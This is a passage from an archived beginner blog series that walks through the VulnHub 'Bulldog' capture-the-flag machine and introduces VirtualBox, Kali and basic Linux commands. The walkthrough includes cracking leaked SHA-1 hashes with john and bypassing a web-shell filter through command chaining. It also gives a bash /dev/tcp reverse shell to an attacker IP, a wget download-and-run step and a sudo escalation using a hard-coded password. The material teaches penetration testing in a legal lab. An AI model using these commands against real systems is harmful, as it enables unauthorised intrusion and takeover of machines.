used in social engineering. If we try that big Web-Shell link, all we find is a message telling us to log in. This is a very interesting lead. If we are able to log in as one of the users - we might get access to some sort of settings panel we can leverage.\nLooking at the /dev page source might provide some more information.\n\u0026ldquo;It\u0026rsquo;s not like a hacker can do anything with a hash\u0026rdquo; - sounds like an invitation to me!\n3. Making Use of Password Hashes # Not only do we have a listing of contacts for each member of the company, but we have them paired with what appear to be password hashes!\nWhat are hashes? # Hashes are similar to, but are not encryption. When a user logs in to a system, the system will check their credentials against its database to see if the password is correct. However, instead of storing the passwords in plaintext, the system stores them as \u0026ldquo;hashes.\u0026rdquo; To better explain this, we are going to use encryption as an analogy for hashing.\nAlgorithms are often explained as black, white, or grey box. For our purposes, a \u0026ldquo;white box\u0026rdquo; algorithm is completely understood and reversible. Black is unknown entirely, and not reversible. Grey is somewhere in the middle.\nRot13 is white box because we understand and can easily perform every single step. It is even its own reverse. Since it affects individual letters, it also does not have what is called \u0026ldquo;avalanche\u0026rdquo; in cryptography. If we alter one small part of a known plaintext, only one small part of the ciphertext will be changed. hello rot13\u0026rsquo;s to urryb while jello rot13\u0026rsquo;s to wrryb. The ciphertext will always be the exact length of the plaintext as well, which is very revealing.\nThe md5 hashing algorithm is not simple to understand, but it is openly published. We can understand the process it uses, but it is very complicated and not feasible to reverse. For this reason, we are calling it grey box. It also has very powerful avalanche, as demonstrated above. md5 hashes are always the same length, no matter how long the plaintext is.\nAs nice as md5 sounds, it is considered obsolete and vulnerable to dictionary and side channel attacks. Unfortunately, it might be the most popular hashing algorithm in use today, in addition to SHA-1.\nHow are hashes used in the login process? # When a user enters in a password string, the system runs the hashing algorithm and stores the result. The hash is compared with user\u0026rsquo;s associated password hash, if it doesn\u0026rsquo;t match, access is not granted.\nIs any of this relevant to Bulldog? # If an attacker were to somehow get a list of hashes, they could attempt to \u0026ldquo;reverse\u0026rdquo; the hashes using a dictionary attack. This simple attack users the attacker\u0026rsquo;s system to run the hashing algorithm on known words, and then compare the results to a list of acquired hashes.\nIf a the hash of a known word matches a user\u0026rsquo;s password hash, that word is the user\u0026rsquo;s password.\nModern systems can perform this operation at speeds that would make Alan Turing faint. A GPU-powered md5 dictionary attack can run billions of hashes per second. However, the number of possible combinations of characters is essentially infinite. The time it would take to brute force a reasonable set of possibilities may be unrealistic. We will need to use a good wordlist and hope that one of our users is not very creative.\nPreparing Our Dictionary Attack # In your Kali terminal, run gedit to open up the text editor.\nFrom the /dev page source, copy all lines containing hashes into the editor and save it as raw_creds.txt in your working directory.\nClose gedit - we are going to clean up our text from the terminal.\nOur credentials file must be in user:hash format in order for our Dictionary Attack tool to make use of it.\nFor the sake of time, I am going to show you a quick method of achieving this result from the command line based on the cut paste and tr commands. If you\u0026rsquo;d like to understand these commands better, you can check out their man pages.\ncut separates lines of text into columns based on a chosen character. paste takes lines from two text files and creates a single file of two columns - one column from each file. tr replaces one group of characters with those from another group. We only need to repalce one character. First, we extract the hashes and save them to a file:\ncat raw_creds.txt | cut -d '!' -f 2 | cut -d '-' -f 3 \u0026gt; hashes.txt Then, do the same for the users:\ncat raw_creds.txt | cut -d '\u0026lt;' -f 1 | cut -d ':' -f 2 \u0026gt; users.txt\nFinally, paste them together, and use tr to change the tab column separators with colons:\npaste users.txt hashes.txt | tr '\\t' ':' \u0026gt; crackme.txt\nOur file is ready, we just need to check what kind of hashes we are attempting to crack.\nCopy one of the hashes, and then paste it into the hash identifying command hashid\nhashid '6515229daf8dbdc8b89fed2e60f10743'\nhashid tells us that our hashes are most likely SHA-1. This is one of the easier hashes to crack, and is about as old and insecure as md5. Let\u0026rsquo;s introduce our file to our friend John.\nJohn Rips into Our Hashes # John The Ripper, or john, is one of the best tools out there for performing a dictionary attack. It has a simple syntax and is often all we need when it comes to offline password recovery. In this case, all we need to specify is what file we are attempting to crack, and what format to use.\njohn crackme.txt --format=Raw-SHA1\nVery quickly, we get a result - and I can\u0026rsquo;t say it is a surprising one. This result will be stored, so we can interrupt john with CTRL-C\n4. Gaining A Low-Privilege Shell # Making Use of Our Credentials # Let\u0026rsquo;s go right for the most rewarding result and try to login to ssh. Our nmap scan told us that ssh was at a non-standard port, so we can check our logs to see which port we need to specify.\nssh nick@bulldog.ctf -p 23\nThis fails, but why not shoot for the moon and try to log in as root right away?\nssh root@bulldog.ctf -p 23\nOh well, didn\u0026rsquo;t hurt to try. SSH isn\u0026rsquo;t our only place we can login. Try /admin\nThis works! We have site access.\n\u0026ldquo;You don\u0026rsquo;t have permission to edit anything\u0026rdquo; doesn\u0026rsquo;t seem promising at first. But now, we are authenticated, and can access the formerly inaccessible /dev/shell page.\nExploiting the Web-Shell # The shell claims that we can only run a list of \u0026ldquo;friendly\u0026rdquo; commands, and all commands are run directly on the server itself. If we figure out how to allow arbitrary commands through, we can get the server to do our bidding. All we need to do is bypass this filter process.\nWe can hypothesize that the command filtering employs some kind of simple if statement. If a command contains one of the allowed commands, the server executes the inputted command.\nPerhaps the if statement only checks to see if the input contains one of the approved commands - not if the input is only made up of approved commands.\nIf that is the case, we might be able to bypass the filter by using an approved command and just immediately following it with any command we like. This would entail running two commands on the same line.\nTo check our theory, we need to prove two concepts:\nThe Web-Shell Allows us to run multiple commands at a time The second command run does not need to be one of the approved commands We know how to run commands on the same line using the ; and \u0026amp;\u0026amp; characters, so let\u0026rsquo;s give those a try.\nIn the webshell, run ls; pwd\nBoth of these commands are on the \u0026ldquo;nice\u0026rdquo; list, but before running some nasty commands we will need to prove our concept.\nThey\u0026rsquo;ve caught us! The computer police are on the way to arrest you now - thanks for playing.\nPerhaps we can have more luck with ls \u0026amp;\u0026amp; pwd\nIt worked! We can run more than one command at a time. Let\u0026rsquo;s try something unapproved, like id, or cd\nIn the webshell, run pwd \u0026amp;\u0026amp; id \u0026amp;\u0026amp; cd /tmp \u0026amp;\u0026amp; pwd\n/tmp is a useful directory since all users have access to it by default. It is a great place for us to set up camp on the target system.\nIf you know a little Linux, the word sudo will catch your eye in the image above. If you are unfamiliar with sudo , know that it can be used to run commands with superuser privileges. We won\u0026rsquo;t be needing to use that functionality here, and can escalate our privileges with other methods.\nWith our concepts proven, we can take advantage of our ability to excute code remotely.\nOur Shelling Process # Our goal now is to get Bulldog to run a \u0026ldquo;reverse shell\u0026rdquo; process. This process allows us to use a Kali terminal window to remotely control Bulldog.\nTo do this, we employ the incredibly useful nc tool. When the reverse shell on Bulldog begins \u0026ldquo;talking,\u0026rdquo; we will use nc to make sure Kali is \u0026ldquo;listening.\u0026rdquo; Then, the two systems can communicate freely and we can give orders directly to Bulldog.\nThere are many different kinds of reverse shells, and even more ways to implement them. After trial and error, I\u0026rsquo;ve found a method that is reliable, but entails more steps than the average reverse shell. The Bulldog webshell is a bit limited, but this process will circumvent these limitations and we will gain access.\nHere is an overview:\nSave a single command that connects a reverse shell back to our Kali machine to a file - this is known as a script. Create it, but don\u0026rsquo;t run it on Kali. Use Kali as a web host, allowing Bulldog to download files from Kali. Run commands in the web shell to download the script to Bulldog from Kali. Run commands in the web shell to execute the script on Bulldog. Bulldog begins talking, and Kali is set up to listen. Shell created. I chose port number 1234 arbitarily because it is easy to remember. You can use any number you like, as long as it doesn\u0026rsquo;t overlap with other protocols (like HTTP at port 80). Pentesters like to use ports 1337 and 31337 for fun. I like to use port numbers 51000 and higher since they are not often assigned to a standard protocol.\nShell Step 1 - Writing the Script # First, we need to create the script. This is as simple as writing the reverse shell command to a file that we give a .sh extension.\nRun the following command on Kali in your working ~/bulldog directory. Replace KALI_IP with Kali\u0026rsquo;s Host-Only IP address - 192.168.56.xx\necho \u0026quot;bash -i \u0026gt;\u0026amp; /dev/tcp/KALI_IP/1234 0\u0026gt;\u0026amp;1\u0026quot; \u0026gt; script.sh\nShell Step 2 - Hosting the Script # Next, we need to set up Kali as a file server that Bulldog can download from. Kali contains a built in method for doing this using Python. We just have to provide a port number.\nAgain, run this inside ~/bulldog\npython -m SimpleHTTPServer 1234\nLet this run, then go to the browser to run step 3.\nShell Step 3 - Downloading the Script # The command we run through the webshell will need to download the script from Kali and make it executable.\nWe will need to break our command down into parts:\npwd to trick the if statement cd /tmp to change to a directory where we have permission to download files wget http://KALI_IP:1234/script.sh to download to that directory chmod +x script.sh to make the script executable Run this in the webshell: pwd \u0026amp;\u0026amp; cd /tmp \u0026amp;\u0026amp; wget http://KALI_IP:1234/script.sh \u0026amp;\u0026amp; chmod +x script.sh\nWhen you return to your Kali terminal window, you will see that the file has been accessed by Bulldog\u0026rsquo;s IP.\nShell Step 4 - Stopping the Webserver and Starting the Listener # Kill the python hosting process with CTRL-C We need will start up the nc listener.\n-l tells nc to listen -n tells nc to not bother trying to convert IP addresses into hostnames (like bulldog.ctf) -v tells nc to be verbose - outputting more information for us to read -p specifies at what port nc should run. This needs to match the port our shell script uses to connect to Kali. nc -lnvp 1234\nShell Step 5 - Finally Popping the Shell # With Kali standing by listening, we just need Bulldog to start talking.\npwd to trick the if statement cd /tmp to return us to the directory where the script is stored bash script.sh to run it! In the webshell run pwd \u0026amp;\u0026amp; cd /tmp \u0026amp;\u0026amp; bash script.sh\nIf it works, the browser window should say \u0026ldquo;connecting\u0026rdquo; but not actually load.\nCheck your terminal window where you put in the nc command. It will contain a command shell for django@bulldog !\n5. Enumeration - Looking for Internal Weaknesses # This user shell is primitive. Very primitive. It does not have tab completion, CTRL-C and other bells and whistles our Kali shell has. This shell can be upgraded, but we will only be doing that a little bit later on. For this box, we can get by with a very primitive shell.\nIf you stop a process with CTRL-C - the shell is stopped instead. If you need to restart your shell, simply repeat steps 4 and 5 of our shell process\nThis CTF simulates a real-world experience, so we may see some common user missteps. People will often leave important notes and reminders simply laying around on their system. These users would leave these things in an email, or maybe their /home folder.\nLet\u0026rsquo;s see what we can see in the /home directory.\ncd /home \u0026amp;\u0026amp; ls We can see here that our website user, Nick, doesn\u0026rsquo;t have a home folder on this machine. This probably means the password we used to log in to the website is of no further use to us. There are folders for bulldogadmin and django, however.\nOur shell, and the id command tells us that we are django, so we should have full access to this folder. bulldogadmin sounds like it would contain some files we might find more interesting than what django has to offer.\nMight as well check to see if root_password_do_not_touch.txt is inside - and if we can read it.\nls -l /home/bulldogadmin Empty? That cant be. Perhaps the files are hidden?\nls -a /home/bulldogadmin All of the files in this directory are hidden! Most of them are configuration files found in every user\u0026rsquo;s folder by default, but not .hiddenadmindirectory This folder is calling to us to take a closer look - let\u0026rsquo;s have a look.\nA period at the beginning of a file denotes a file is hidden, but it is also part of its name. If we want to enter this directory, all we need to do is include the period in our command.\nEnter this folder and list its contents - making sure we look for more hidden files.\ncd /home/bulldogadmin/.hiddenadmindirectory \u0026amp;\u0026amp; ls -a A note? Could this be our AdminPassNoHackersPlz.txt file?\ncat note Very interesting. \u0026quot;\u0026hellip;the webserver is the\u0026hellip; \u0026hellip;one who needs to have root access\u0026hellip;\u0026quot; is all I needed to hear to get me interested. The other lines that got my attention were \u0026ldquo;Once I\u0026rsquo;m finished with it, a hacker wouldn\u0026rsquo;t even be able to reverse it,\u0026rdquo; and \u0026quot;\u0026hellip;it\u0026rsquo;s still a prototype right now.\u0026quot;\nMaybe we can reverse engineer this customPermissionApp and find something useful.\n6. Reversing to Root # Reverse engineering can be a complicated process that would normally exceed the scope of this document. But there are a few simple steps we can try that might be productive.\nThe customPermissionApp isn\u0026rsquo;t a text file, but is likely a compiled program. We can confirm this with file customPermissionApp As a result, simply trying to read it with cat will show binary characters that have the potential to crash our terminal and shell. To get around this, we can use strings\nstrings is used to read files, but only outputs friendly, human readable characters to the terminal. This file might be pretty long, however, so we should pipe it to the less command as well. Unfortunately, our shell is too primitive at this stage to use less\nWe need what is called a tty which allows for more interactivity. A reliable way of getting a tty uses python, which we know our system is running from way back when we did our nmap scans.\npython -c 'import pty;pty.spawn(\u0026quot;/bin/bash\u0026quot;) This may throw out an error, but will still work. The error comes from the /bin/bash part of our command, and is the same as the error we saw when we started the reverse shell.\nWe can now run our strings command and pipe it directly into less\nstrings customPermissionApp | less Running this will produce an error, saying WARNING: terminal is not fully functional This doesn\u0026rsquo;t stop us from moving forward.\nWe have have isolated all the easily read characters, so let\u0026rsquo;s see if anything jumps out at us.\nThe first thing I noticed was sudo su root at the bottom. If a user is set up as superuser, and runs this command, the system asks for their password, and then switches the terminal from user shell to a root shell. Note that the system does not ask for the root password to upgrade a shell from user to root, but merely the superuser\u0026rsquo;s password. sudo su doesn\u0026rsquo;t run a single command as root, but logs in as root. This is exactly what we want to achieve.\nWe know that sudo su requires a password, but look at this line from the application:\nUsage: ./customPermissionApp \u0026lt;username\u0026gt;\u0026quot;\nThe application doesn\u0026rsquo;t appear to ask for a password, does it? Also, the note mentioned that the application only set up to work for the Django user. Could this mean that the password for the Django user is hard-coded into the password itself?\nWe should read the whole file to try to find something. Start with the section we are already looking at.\nHmm, this isn\u0026rsquo;t quite readable but we can make a decent guess out of it.\nSUPERultH imatePASH SWORDyouH CANTget You know, if you dropped those pesky H\u0026rsquo;s at the end, you would find\nSUPERultimatePASSWORDyouCANTget\nCould this be our \u0026ldquo;hidden\u0026rdquo; password?\nLet\u0026rsquo;s try it!\nsudo su\npassword: SUPERultimatePASSWORDyouCANTget\nWe own this box now - we are the top (bull)dog! We have access to all files, can change any passwords, install backdoors, and run amok as we please.\nIf this were a real pentest, we may attempt to cover our tracks or use this box as a staging ground for accessing other machines on a network. A hacker might use this machine to serve their botnet, or as a proxy to commit actions that may be traced back to Bulldog Industries.\nAll we want to do, however, is grab the flag from the /root directory.\ncd /root \u0026amp;\u0026amp; ls cat congrats.txt Conclusion # If you want to get into more CTFs, I recommend Vulnhub and HackTheBox as great platforms.\nVulnhub maintains this list of resources which may serve as your launchpad for all things security.\nCTFs are a fun way of testing your problem solving ability, learning a ton, and developing a skill that can blossom into a new career in cybersecurity. Most importantly, they will help you develop the CTF MINDSET.\nThis mindset is prevalent throughout the pentesting community and will be one of your greatest assets.\nHere are a few pieces of this mindset:\nTry harder - This is the official advice of the OSCP Pentesting Certification Be self-reliant. CTF writeups are one of the ONLY places you will be spoon fed ideas on how to move forward. If you approach a community of pentesters without showing your own independent efforts, there is an excellent chance you will simply be shown the door. If you don\u0026rsquo;t know something, learn it. Search online, read some books, watch some tutorials and try again. \u0026ldquo;How is this intended to be used? How can I do something unexpected?\u0026rdquo; \u0026ldquo;What would happen if I\u0026hellip;\u0026rdquo; I hope you had fun capturing your first flag!\n","date":"23 January 2018","externalUrl":null,"permalink":"/archive/your-first-ctf/yourfirstctf-2/","section":"Archive","summary":"Tame the bulldog with your newfound skills!","title":"Your First CTF 2 - Taming the Bulldog","type":"archive"},{"content":" Archived Content The items in the archive are frozen in time and will not be updated.\n\u0026ldquo;What is a CTF?\u0026rdquo; to Your First Root Flag (2018) # A two part series that can take you from having never heard of CTFs or running Linux to capturing your first root flag in a matter of hours. Turbo-start your CTF Skills!\n","date":"17 January 2018","externalUrl":null,"permalink":"/archive/your-first-ctf/","section":"Archive","summary":"A two part series that can take you from having never heard of CTFs or running Linux to capturing your first root flag in a matter of hours. Turbo-start your CTF Skills!","title":"Series: Your First CTF","type":"archive"},{"content":" Archived Content The items in the archive are frozen in time and will not be updated.\n1. Background - What are we talking about? # Capture the Flags are intentionally vulnerable systems designed for people to hack into. They contain specially placed vulnerabilities that the attacker has to identify and exploit in order to gain a certain level of access. To prove this level of access, a \u0026ldquo;flag\u0026rdquo; file is often placed for the attacker to find.\nThe \u0026ldquo;flag\u0026rdquo; might contain a unique string of characters that prove the attacker has reached their goal, or might just show a congratulatory message. In some instances, the attacker just needs to gain control over the most powerful user on the system. CTFs are created to help people learn skills needed to test real world systems while providing a safe and LEGAL method of doing so.\nShort Legal Caveat: If you want to learn to hack or how to become a penetration tester - use CTFs, not real people\u0026rsquo;s machines. CTFs are designed for you to experiment and play with. It is very difficult to cause any real world harm if you use them properly. Getting a few thrills breaking into real people\u0026rsquo;s systems is not the way to learn.\nONLY PRACTICE TECHNIQUES LEARNED HERE ON SYSTEMS YOU HAVE\nE X P L I C I T\nPERMISSION TO HACK\nA locksmith and a burglar may use the same tools, it is only HOW they are used that separates criminals from respected professionals.\n2. Description - What is this document? # Regardless of what operating system your host OS uses, this guide attempts to take you from \u0026ldquo;What is a CTF?\u0026rdquo; and never running a Linux command in your life to capturing the root flag on a Linux machine in the span of hours.\nOur capture the flag will take the form of a Linux virtual machine that we will be running on our own computers. Since this machine is intended to be vulnerable, we are going to isolate it from as many networks as possible, especially the internet. A competent hacker may be able to gain access from to the VM and then \u0026ldquo;jump out\u0026rdquo; to the host (your real computer) to cause all sorts of trouble.\nWe will use the VirtualBox virtualization software, which runs on Windows, Mac and Linux. The setup process for each type of operating system is pretty similar, so this document will only cover a general outline.\nThe CTF we will use is Nick Frichette\u0026rsquo;s \u0026ldquo;Bulldog\u0026rdquo; found on VulnHub.com at https://www.vulnhub.com/entry/bulldog-1,211/\nNote: You will be able to find walkthroughs for this box online, but reading them will spoil the learning process for you. Many walkthroughs (including one of my own) assume the reader already has some knowledge of pentesting and Linux, and might only contain the shortest possible path to root. Walkthroughs may show you the fastest route, but it is likely they will not provide much information aimed at the absolute beginner.\nThe pathway we will take might not be the absolute shortest, and may not always follow best practices, but it is beginner friendly and will teach you enough to tame the Bulldog. The tools we will use to accomplish our goal can be found conveniently organized in the Kali Linux distribution.\nKali will run in a virtual machine at the same time as our CTF machine, and we will route all of our attacks through it. Kali can be run natively, but is designed to be easy to run as a virtual machine or live boot. The CTF machine is quite minimal - it does not run a graphical interface of any kind, and can only be accessed via command line. However, running two virtual machines simultaneously may heavily tax some computers. We will be able to adjust our specifications as needed.\nThe virtualization software can run a multitude of operating systems. These OS\u0026rsquo;s are broken into categories that can form a family tree. With Linux as our main branch, can treat \u0026ldquo;Debian\u0026rdquo; as our next branch, and \u0026ldquo;Kali\u0026rdquo; as the final leaf. Not all Linux-based operating systems are Debian-based, but all Debian-based OS\u0026rsquo;s are Linux. The most popular Debian OS is Ubuntu. Kali is a distribution of Debian designed for security usage.\nOur first step is to get Kali up and running.\n3. Setting Up Virtualbox and Kali # While you may already have Virtualization software on your computer, the author of the CTF specifies that this box was designed to be run with VirtualBox. As VBox is my personal choice, I have not troubleshooted getting it running using VMWare or any other software. The author has also expressed problems with VMware, so it may be easiest to simply run VBox.\nDownload the Appropriate Virtual Box Files for your OS Here:https://www.virtualbox.org/wiki/Downloads\nVirtualbox also comes with an \u0026ldquo;Extension Pack\u0026rdquo; that provides additional features:http://download.virtualbox.org/virtualbox/5.2.4/Oracle_VM_VirtualBox_Extension_Pack-5.2.4-119785.vbox-extpack\nWe are going to run the 64 bit version of Kali. A lighter, 32-bit version, is available, and might work for our purposes. However, I have not tested it.\nDownload the Kali OVA file - this can be done directly or via torrent. Make sure you download the VirtualBox version of the image, not the VMWare version.\nhttps://www.offensive-security.com/kali-linux-vmware-virtualbox-image-download/\nDownload the file from the above link. Torrent is likely fastest. Once VirtualBox is installed and the torrent is complete, run the downloaded .OVA file\nChange the name to something like \u0026ldquo;Kali\u0026rdquo; Set \u0026ldquo;Guest OS Type\u0026rdquo; to \u0026ldquo;Linux -\u0026gt; Debian (64-bit)\u0026rdquo; If you like, you can change the location of the VM\u0026rsquo;s virtual hard disk, as well as the number of CPUs and and RAM it will use. Set these parameters to match the specifications of your computer.\nWhen you are ready, click \u0026ldquo;Import\u0026rdquo; and let it the VM install. This process will likely take 2-3 minutes. Selecting your newly installed Kali system on the left side of the panel and click the green arrow key labeled \u0026ldquo;Start\u0026rdquo; to boot it up.\nClicking on the window where the VM is running will bring up a prompt asking if you want to \u0026ldquo;Capture\u0026rdquo; your mouse. This means that the mouse will be \u0026ldquo;bounded\u0026rdquo; within the VM Window and able to interact with it. If you want to have your mouse escape the window, press Right-Control on Windows and Linux and Left-Command on Mac. Don\u0026rsquo;t forget this!\nIf your mouse gets \u0026ldquo;trapped\u0026rdquo; in the VM you can free it by pressing:\nThe CTRL Key on the RIGHT SIDE of the keyboard on Windows and Linux The \u0026ldquo;Command\u0026rdquo; key on the LEFT SIDE of a Mac keyboard At the main login screen, enter the default credentials for the OVA\nusername: root password: toor It may come as a surprise to you that we log in with root access. Kali is designed for general usage like most operating systems, it is specified for security. It is not meant to host multiple users with different privileges. If you are running Kali, you are the big boss of the system (in this case, our VM) and your word is law.\nThe system will follow your commands and orders to the letter - no matter what.\nRoot access means any properly formatted command will be executed without asking twice, and may be irreversible.\nIf your command tells the system to delete itself, it won\u0026rsquo;t double check if you are sure. The system will just begin to delete.\nOpen up the terminal app from the dock and we will go over some basic Linux operations.\n4. Linux Basics: Users, Permissions and the Command Line # If you know the basics of Linux, feel free to skip this section.\n\u0026ldquo;Why do I have to use the command line? It\u0026rsquo;s the 21st century! Show me some pictures!\nMany tools, including some that we will be using in this CTF have graphical user interfaces. While these are often functional, they may end up slowing down productivity as it is very difficult to make a given process occur, say, hundreds of times, by clicking the mouse. When we actually gain access to a machine we are attempting to conquer, it is not going to be through a remote desktop client. We will not be moving a mouse around and clicking icons.\nWe will be gaining access via command line \u0026ldquo;shells\u0026rdquo;. Some of these shells can be quite primitive and can miss many of the features that the terminal on your local machine has by default. Finally, a process that relies on the entry of simple text commands is far easier to document than one that requires blueprints and step by step diagrams.\nWhy use the command line?\nScripting Documentation Remote shells don\u0026rsquo;t have pictures This is a bare bones explanation of Linux. There are many, many core details that it ignores completely. It only explains the minimum needed to conquer the CTF in Part 2.\nLinux File System: # All of the files on a Linux system sprout from the root directory. Most commonly, this directory is simply called / by the system and pronounced \u0026ldquo;root.\u0026rdquo; Directories contain files and subdirectories, which may contain more subdirectories. Subdirectories are given specific purposes that is often standardized across all systems. For example, automatically generated system logs will be saved to the /var/log directory. Files can be read, written to, or executed. But just not anyone can just come along and make changes.\nLinux Users: # A Linux system is usually divided into different users. Not all of these users are actual humans, some are employed by the system to execute certain tasks. The average human user has their own \u0026ldquo;home\u0026rdquo; folder, located at /home/username In many cases, this area represents most of the files this user has access to. A user may have access to a few select programs, but a well-maintained system will give a user the absolute minimum of permissions necessary to accomplish what they need to. They might not be able to run every command, access every folder and certainly cannot access administrative files.\nLinux Superusers: # An admin user will have more permissions than an average user, and superusers have all the power. Superusers have read and write access to EVERY file. They are able to change the passwords for every user, add users, delete users, and execute any command. If a user needs to gain access to a file they used to not be able to access, an admin will have to come in and change the permissions to that file. On most Linux systems, even admin users don\u0026rsquo;t actively use root all the time. A root user has the power to make very big, irreversible mistakes when dealing with important files.\nOn our Kali system, there is only one user - root. Instead of having a /home directory, the \u0026ldquo;home\u0026rdquo; folder for root is /rootThis is easily confused with the / directory. I will differentiate between the two by calling / the \u0026ldquo;system\u0026rdquo; root directory, and /root the \u0026ldquo;user\u0026rdquo; root directory.\nEssential Commands: # To run a command, type it into the command line and press enter. That\u0026rsquo;s it.\nTo interrupt a command while it is running, press CTRL-C\nSome commands are an exception to this rule, but closing the terminal window where the command is running will stop the process. The process can be directly killed, but we don\u0026rsquo;t need to get into that here.\npwd - outputs the current location. When we open the terminal application after login, we find ourselves in the user root.\nclear - clears the contents of the terminal\nRun it between commands to get a clean slate.\nman - This is the \u0026ldquo;what am I doing?\u0026rdquo; command.\nEvery command here, and every command with the proper documentation will contain a manual page. If you want to see a detailed explanation of what a command has to offer, just type\nman COMMAND and read the documentation\nls - lists the contents of a directory\nls -a shows ALL directory contents, included those normally hidden\nls -l shows the ownership/permissions of each file in the directory\nThere are many more flags to the ls command, all of which can be combined.\nls -la is enough for our purposes.\nls run with no directory specified shows the contents of the current directory, but it will show the contents of a specified directory if given one. Try ls / to see the contents of the system root directory.\nmkdir - \u0026ldquo;make directory\u0026rdquo;\nJust specify the name of the directory.\nmkdir a_folder creates a subdirectory of our current directory called a_folder\nLet\u0026rsquo;s make another, called b_folder as well.\ncd - \u0026ldquo;change directory\u0026rdquo; takes you to the directory you point it to.\nWe can use our directory synonyms here.\n~ = user\u0026rsquo;s home folder / = system root .. = one folder above the current directory cd a_folder\nThese synonyms can be used in paths as well. In this case, the following three commands all do the same thing:\ncd /root/b_folder cd ~/b_folder cd ../b_folder /root and ~are the same when the current user is root, since ~refers to the current user\u0026rsquo;s home folder.\n.. refers to a relative location, not a full path. It will only jump out one directory. If we had gone one level deeper, into a subdirectory of b_folder, .. would refer to b_folder, not /root.\necho - this command is used to send text to the terminal output. This string will always end with a newline.\ncat - \u0026ldquo;concatenate\u0026rdquo; - used to read files\nWe will use two these commands to demonstrate some important things about input and output.\necho \u0026quot;hi\u0026quot; - will send the word \u0026ldquo;hi\u0026rdquo; to the terminal output.\necho \u0026quot;hi\u0026quot; \u0026gt; hi.txt - will save the word \u0026ldquo;hi\u0026rdquo; to a file called hi.txt\ncat hi.txt - will display the contents of hi.txt to the terminal output.\necho \u0026quot;hello\u0026quot; \u0026gt; hi.txt - will OVERWRITE hi.txt to contain \u0026ldquo;hello\u0026rdquo;\necho \u0026quot;hello\u0026quot; \u0026gt;\u0026gt; hi.txt - will ADD \u0026ldquo;hello\u0026rdquo; to the end of hi.txt without disturbing the older lines.\ncat \u0026gt;\u0026gt; file.txt - will add each line you type in to a file called file.txt\nto exit this, press CTRL-D\ncat file.txt hi.txt - will display both files sandwiched together to the terminal outputs cat file.txt hi.txt \u0026gt; bigfile.txt - will write the contents of file.txt with the contents of hi.txt tacked on to the end a new file called bigfile.txt rm - \u0026ldquo;remove\u0026rdquo; - used to delete files and folders.\nrm cannot be undone easily. Don\u0026rsquo;t be sorry, be careful.\nThe file is not moved to a trash folder, it is gone. It can be retrieved for a short while using forensics tools, but once you delete something - or edit it, for that matter - it pretty much stays that way.\nrm FILE_NAME - will delete a file rm -r DIRECTORY_NAME - can an be used delete a directory and all its contents, including all the contents of subdirectories within subdirectories. This is known deleting things recursively. rm * - deletes ALL files in the current directory, but not directories or the files within them. rm -r * - deletes ALL files and subdirectories in the current directory, recursively. The * operator is not unique to rm It can be used as a wildcard to \u0026ldquo;fill in the blanks\u0026rdquo; in many contexts. Here we can use it read files with something common in their name. See the example pictured below.\nless - this command is used to read a file bit by bit, instead of reading the whole thing and skipping right to the end.\nTo properly demonstrate this, we will need a long file.\nLuckily, Kali comes with wordlists pre-installed for password recovery and other bruteforcing methods.\nless /usr/share/wordlists/dirb/common.txt\nThis command allows us to scroll through the wordlist a block at a time. Use the arrow keys or scroll wheel to move around the file, and press the Q key to exit.\nUse the Q key to exit from less\nless can be applied to any output using the | character, called \u0026ldquo;pipe.\u0026rdquo;\nIf you ran ls -la in the system root, the output wouldn\u0026rsquo;t fit in a single terminal window. You can use less in order to scroll through them all.\nls -la / | less Pipe | is used to\u0026hellip; pipe any output in the terminal output to a location of your choosing. This is very useful when combined with the tee command, which will allow the output to be displayed and logged simultaneously.\nMany programs have a built in logging option, but a quick (and sometimes inferior) logging option is to use\nCOMMAND | tee log.txt\nwhich pipes the output to a log.txt file while displaying it to the terminal output.\nNote that in some instances we could use\nCOMMAND \u0026gt;\u0026gt; log_file.txt\nbut that will not show us the terminal output in real time, just save it to the log file.\nid - this simple command tells us about the current user.\nThis might not seem all that useful now, but when we get into the CTF it can be very useful for gathering information.\n\u0026amp;\u0026amp; and ; - place these after a command to run mulitple commands in a series.\n\u0026amp;\u0026amp; - run the command after the \u0026amp;\u0026amp;\u0026rsquo;s only if the command before doesn\u0026rsquo;t have an error. ; - run the command after the semicolon - no matter what. Either method can be used with any number of commands in a row.\npwd; ls - will output our current directory and its contents.\ncd c_folder \u0026amp;\u0026amp; ls - will only run ls if we successfully enter c_folder. If c_folder does not exist, ls will not run.\nEssential Terminal Shortcuts: # Tab Key - used to auto-complete a command. It can guess what file/directory you will type if you give it the first few letters Try typing ls /ro and then press TAB instead of enter, it will autocomplete to ls /root - then press enter.\nUp and Down Arrow Keys - the terminal \u0026ldquo;remembers\u0026rdquo; the commands you type in. If you press the up arrow, it will fill in the last command you entered in. Keep pressing it to go back further in your history. If you go past the command you wanted to use, use the down key to go the other way.\nThere are way too many commands to go over here, and they can be combined and twisted and modified to do all kinds of things. You won\u0026rsquo;t need them all for our CTF, but you WILL need to have a basic understanding of:\nThe Basics of the file system The basics of users and permissions ls, cd, cat, |, \u0026amp;\u0026amp; We will be running most of our penetration testing commands from the terminal itself, but they can be explained in context.\n5. Update the Kali VM # If your host machine has internet access, Kali should be connected to the internet as well. You can check this by pinging a website.\nping google.com\nIf you are not connected to the internet, you may need to do some troubleshooting on your own. This problem can happen from time to time and this page is a good place to start looking how to fix it.\nAs a Debian-based Distro, Kali uses the apt package manager. Instead of having to download installers and update individual applications and features manually, we can use apt to get our system up to speed with just one line.\napt-get update \u0026amp;\u0026amp; apt-get upgrade\nThis will start a long updating process that can take half an hour or so. During that time, it may ask you to confirm some changes. Go with yes, or the default option for each one. Specific parameters can be changed later, and we will not need to alter these to do our CTF.\nThe \u0026ldquo;update\u0026rdquo; portion checks the trusted Kali software repositories for the newest versions, and the \u0026ldquo;upgrade\u0026rdquo; portion upgrades the parts of your system that needs to be updated.\nYou might be wondering - can I skip this step? The answer to that question is \u0026ldquo;You shouldn\u0026rsquo;t.\u0026rdquo;\nWhen dealing with cybersecurity, it pays to be up to date. In 2017, a patch for the bug that allowed the WannaCry ransomware to spread was released WELL before the outbreak of the malware. Updated machines were simply not vulnerable to the exploit needed for WannaCry to work as intended. Software has bugs, and most found bugs are patched away. There is no magic armor to protect you from all threats, and sometimes patches themselves are not perfect, but keeping your systems up to date may be THE most effective step you can take to protect your systems.\n\u0026ldquo;But why update my ATTACKING VM?\u0026rdquo;\nFrom a practical perspective, any problems that may arise while following along with the CTF instructions in part 2 may be related to software versions. I will update, and by updating, you ensure that we are on the same page.\nUpdating the Kali VM May Annoy Your Host System’s Antivirus: # Funnily enough, antivirus may detect that someone (you) are installing software that can be used maliciously on your computer! Good job, I 